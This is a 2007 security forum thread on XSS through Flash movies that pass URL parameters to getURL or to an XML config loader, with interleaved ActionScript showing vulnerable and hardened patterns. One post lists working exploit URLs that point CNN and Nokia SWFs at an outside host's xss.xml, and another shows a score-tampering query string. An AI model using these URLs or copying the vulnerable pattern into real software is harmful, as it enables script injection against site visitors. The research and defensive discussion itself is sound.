XSS via flash ... your opinion is welcome
Posted by: xxradar
Date: October 10, 2007 04:11PM

Hi everyone,
Just new to the forum (so maybe I'm telling old news).

During the last couple of days I've been doing some web app testing against a series of websites that use quite a few .swf objects. I started to decompile a bunch of these Flash files and found out that quite a few of them simply call the getUrl method, using parameters provided via the HTML page.

In no time, I even found examples that include a simple check to verify whether the parameter is defined externally or not (in the latter case, it takes a default value). In this case the vector is almost invisible unless decompiled.

It is no secret that getUrl can execute javascript:...., but it is apparently very easy to inject this directly via the address bar by calling the swf directly with a parameter. (I tried some encoding techniques and they worked fine too.)

Does anyone have some references or more info on the subject?

Looking for an example? The flash on www.Astalavista.net is a perfect example. Download it locally and decompile the swf file using flare. It is very easy to spot the parameters and how to call them via the address bar. I copied the flash to a local webserver and got very good results in injecting scripting.

Feedback is most welcome.
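As an added illustration of the pattern described in this post (this is example code written for this page, not code from the thread or from any site mentioned in it), the ActionScript 2 snippet below shows a movie that reads a link target from a flashvar, falls back to a default when none is supplied, and hands the value to getURL, followed by a hardened variant that only calls getURL for absolute http/https URLs whose host is on an allowlist. The flashvar name clickUrl, the button instance names goButton and safeButton, and the host list are assumptions.

```actionscript
// ActionScript 2 (Flash Player 8 era). Added example; not the thread's code.
// Flashvars set in the HTML or appended to the SWF's query string arrive as
// variables on the main timeline (_root), which is what makes the first
// pattern reachable from the address bar.

// --- Vulnerable pattern: the default value hides the external input --------
var clickUrl:String = _root.clickUrl;          // assumed flashvar name
if (clickUrl == undefined) {
    clickUrl = "http://www.example.com/";      // reads as harmless on the timeline
}
goButton.onRelease = function():Void {
    getURL(clickUrl, "_self");                 // a javascript: URL runs in the embedding page's origin
};

// --- Hardened pattern: allowlist scheme and host before calling getURL -----
var allowedHosts:Array = ["www.example.com", "example.com"];   // assumed allowlist

// Returns the host of an absolute http/https URL, or null for anything else.
function hostOf(u:String):String {
    if (u == undefined || u == null) return null;
    // Strip whitespace and control characters first: encoded variants of the
    // scheme survive a naive prefix check otherwise. Scheme matching is
    // case-insensitive, so compare a lowercased copy.
    var cleaned:String = "";
    for (var i:Number = 0; i < u.length; i++) {
        var c:Number = u.charCodeAt(i);
        if (c > 32 && c != 127) cleaned += u.charAt(i);
    }
    var lower:String = cleaned.toLowerCase();
    var start:Number;
    if (lower.indexOf("https://") == 0) start = 8;
    else if (lower.indexOf("http://") == 0) start = 7;
    else return null;                          // javascript:, data:, vbscript:, relative paths all rejected
    var end:Number = lower.length;
    var slash:Number = lower.indexOf("/", start);
    var q:Number = lower.indexOf("?", start);
    var hash:Number = lower.indexOf("#", start);
    if (slash != -1) end = slash;
    if (q != -1 && q < end) end = q;
    if (hash != -1 && hash < end) end = hash;
    var host:String = lower.substring(start, end);
    var at:Number = host.lastIndexOf("@");     // drop userinfo so "allowed.host@other" does not pass
    if (at != -1) host = host.substring(at + 1);
    var colon:Number = host.indexOf(":");      // drop an explicit port
    if (colon != -1) host = host.substring(0, colon);
    return host;
}

function isAllowedUrl(u:String):Boolean {
    var h:String = hostOf(u);
    if (h == null) return false;
    for (var i:Number = 0; i < allowedHosts.length; i++) {
        if (allowedHosts[i] == h) return true;
    }
    return false;
}

// Anything that fails the check silently falls back to the built-in default.
var safeClickUrl:String = isAllowedUrl(_root.clickUrl) ? _root.clickUrl : "http://www.example.com/";
safeButton.onRelease = function():Void {
    getURL(safeClickUrl, "_self");
};
```

For movies you cannot recompile, the embedding page has its own control: setting the allowScriptAccess parameter of the object/embed tag to "never" (or "sameDomain" for a movie served from the same host) makes the player refuse javascript: calls issued through getURL, so the injection in the first pattern no longer reaches the page's script context.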

Re: XSS via flash ... your opinion is welcome
Posted by: kuza55
Date: October 10, 2007 06:56PM

Yep, there's some really good work on that subject by Stefano Di Paola, fukami & others; here are some links which may interest you:

http://www.wisec.it/sectou.php?id=464dd35c8c5ad
https://www.flashsec.org/mediawiki/images/8/8a/CCCampFlashSec.pdf
https://www.flashsec.org/wiki/Articles

And the FlashSec wiki is pretty good in general as well.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: XSS via flash ... your opinion is welcome
Posted by: Gareth Heyes
Date: October 11, 2007 04:00AM

This flaw has been around for ages, but I'm surprised that it hasn't been exploited more often, especially when you consider that global variables can be injected into Flash for things like online games, where you can win prizes for the top scores ;) Of course you can call the scoreboard code directly, but some Flash games encode things.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: XSS via flash ... your opinion is welcome
Posted by: kuza55
Date: October 11, 2007 04:45AM

Gareth Heyes Wrote:
-------------------------------------------------------
> Especially when you consider that global variables
> can be injected into Flash for things like online
> games, where you can win prizes for the top scores
> ;) Of course you can call the scoreboard code
> directly but some Flash games encode things.

According to FlashSec (i.e. fukami), this behaviour has been removed in AS3: https://www.flashsec.org/wiki/Overwriting_Global_Variables

And even if Flash encodes things, you can always just recompile your own version, so the variable injection issue is really pretty irrelevant to Flash games.

Re: XSS via flash ... your opinion is welcome
Posted by: Gareth Heyes
Date: October 11, 2007 05:57AM

Yeah, I know that, but why bother to download and recompile when sometimes you can just do:

game.swf?total=1000

I thought it was cool anyway

Re: XSS via flash ... your opinion is welcome
Posted by: fukami
Date: October 12, 2007 10:00AM

What I find even funnier is to overwrite config data used with XML.data(). So it's possible to use a foreign movie with your own content =)

Some examples:
* CNN "v0t3 t3h l33t": http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/config.xml
* CNN XSS: http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/xss.xml
* Original site: http://www.cnn.com/ELECTION/2008/debates/scorecard/

* Nokia offers OpenMoko: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/config.xml
* Nokia XSS: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/xss.xml
* Original site (gone?!): http://www.nokia.com/A4299040p
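As an added illustration of the config-overwrite problem in the post above (example code written for this page, not the code of the movies listed, whose internals are not shown in the thread), the ActionScript 2 snippet below shows a loader that takes its XML configuration location from a flashvar, and beside it a loader that accepts only a plain file name and resolves it next to the running SWF. The flashvar name configUrl and the applyConfig function are assumptions.

```actionscript
// ActionScript 2. Added example; not code from the thread or the sites it lists.
// Taking a config URL from a flashvar lets anyone point the movie at XML they
// host themselves; the hardened loader only ever fetches from the SWF's own
// directory, so the query string can choose among the author's files at most.

function applyConfig(doc:XML):Void {
    // Assumed consumer of the configuration; here it just reports the root node.
    trace("config root: " + doc.firstChild.nodeName);
}

// --- Vulnerable pattern ----------------------------------------------------
var cfg:XML = new XML();
cfg.ignoreWhite = true;
cfg.onLoad = function(ok:Boolean):Void {
    if (ok) applyConfig(this);
};
var configUrl:String = _root.configUrl;                 // assumed flashvar name
if (configUrl == undefined) configUrl = "config.xml";
cfg.load(configUrl);                                    // any absolute URL is honoured

// --- Hardened loader -------------------------------------------------------
// Directory of the running SWF, derived from its own _url, e.g. "http://host/path/".
function swfDirectory():String {
    var url:String = _root._url;
    return url.substring(0, url.lastIndexOf("/") + 1);
}

// Accepts a bare file name made of letters, digits, '-', '_' and '.', ending in
// ".xml", with no path separators, no scheme and no "..", and resolves it beside
// the movie. Returns null for anything else.
function safeConfigUrl(name:String):String {
    if (name == undefined || name == null) return null;
    if (name.length == 0 || name.length > 64) return null;
    for (var i:Number = 0; i < name.length; i++) {
        var c:String = name.charAt(i);
        var ok:Boolean = (c >= "a" && c <= "z") || (c >= "A" && c <= "Z") ||
                         (c >= "0" && c <= "9") || c == "-" || c == "_" || c == ".";
        if (!ok) return null;                           // rejects ':', '/', '\\', '?', '@' and friends
    }
    if (name.indexOf("..") != -1) return null;          // no traversal
    if (name.substring(name.length - 4) != ".xml") return null;
    return swfDirectory() + name;
}

var safeCfg:XML = new XML();
safeCfg.ignoreWhite = true;
safeCfg.onLoad = function(ok:Boolean):Void {
    if (ok) applyConfig(this);
};
var requested:String = safeConfigUrl(_root.configUrl);
safeCfg.load(requested != null ? requested : swfDirectory() + "config.xml");
```

Flash's cross-domain policy does not help here: the player checks the policy file of the host being read from, and in the overwrite scenario that host belongs to whoever supplied the URL, so only the movie's own restriction on where it will load from closes the hole.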

Re: XSS via flash ... your opinion is welcome
Posted by: Gareth Heyes
Date: October 12, 2007 11:51AM

@fukami

Hehe excellent!
